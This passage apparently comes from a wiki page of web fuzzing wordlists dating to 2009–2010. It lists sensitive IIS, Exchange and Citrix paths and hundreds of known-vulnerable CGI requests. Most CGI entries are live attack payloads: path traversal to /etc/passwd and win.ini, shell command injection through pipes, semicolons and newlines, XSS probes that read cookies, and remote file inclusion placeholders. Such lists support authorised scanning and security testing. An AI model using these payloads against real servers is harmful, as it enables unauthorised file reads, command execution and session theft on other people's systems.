/iisadmpwd/aexp4b.htr&lt;br /&gt;
/iisadmpwd/anot.htr&lt;br /&gt;
/iisadmpwd/anot3.htr&lt;br /&gt;
/iiasdmpwd/&lt;br /&gt;
/scripts/fpcount.exe&lt;br /&gt;
/scripts/cgimail.exe&lt;br /&gt;
/scripts/tools/newdsn.exe&lt;br /&gt;
/scripts/tools/getdrvs.exe&lt;br /&gt;
/scripts/convert.bas&lt;br /&gt;
/cgi-bin/htmlscript&lt;br /&gt;
/scripts/counter.exe&lt;br /&gt;
/scripts/no-such-file.pl&lt;br /&gt;
/cgi&lt;br /&gt;
/scripts/iisadmin/ism.dll?http/dir&lt;br /&gt;
/scripts/samples/search/webhits.exe&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft URLs (18 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Interesting IIS Files &amp;amp; Directories (17 March, 2009)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s. &lt;br /&gt;
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.&lt;br /&gt;
&lt;br /&gt;
.printer&lt;br /&gt;
/%NETHOOD%/&lt;br /&gt;
/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/Exadmin/&lt;br /&gt;
/ExchWeb/&lt;br /&gt;
/Exchange/&lt;br /&gt;
/Microsoft-Server-ActiveSync/&lt;br /&gt;
/OMA/&lt;br /&gt;
/OWA/&lt;br /&gt;
/Public/&lt;br /&gt;
/_layouts/alllibs.htm&lt;br /&gt;
/_layouts/settings.htm&lt;br /&gt;
/_layouts/userinfo.htm&lt;br /&gt;
/_vti_bin/&lt;br /&gt;
/_vti_bin/_vti_aut/fp30reg.dll&lt;br /&gt;
/_vti_pvt/&lt;br /&gt;
/_WEB_INF/&lt;br /&gt;
/a%5c.aspx&lt;br /&gt;
/adovbs.inc&lt;br /&gt;
/aspnet_files/&lt;br /&gt;
/certcontrol/&lt;br /&gt;
/certenroll/&lt;br /&gt;
/certsrv/&lt;br /&gt;
/exchange/root.asp&lt;br /&gt;
/forum.asp&lt;br /&gt;
/forum_arc.asp&lt;br /&gt;
/forum_professionnel.asp&lt;br /&gt;
/iisadmin/&lt;br /&gt;
/iishelp/&lt;br /&gt;
/iishelp/iis/misc/default.asp&lt;br /&gt;
/iissamples/&lt;br /&gt;
/imprimer.asp&lt;br /&gt;
/includes/adovbs.inc&lt;br /&gt;
/msadc/&lt;br /&gt;
/null.htw&lt;br /&gt;
/pbserver/pbserver.dll&lt;br /&gt;
/postinfo.html&lt;br /&gt;
/rubrique.asp&lt;br /&gt;
/scripts/&lt;br /&gt;
/share/&lt;br /&gt;
/tsweb/&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.asp&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
index.shtml&lt;br /&gt;
x.htw&lt;br /&gt;
x.ida&lt;br /&gt;
x.idq&lt;br /&gt;
/citrix/&lt;br /&gt;
/citrix/AccessPlatform/auth/&lt;br /&gt;
/citrix/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/&lt;br /&gt;
/AccessPlatform/auth/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix//AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/Citrix/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix/PNAgent/config.xml&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
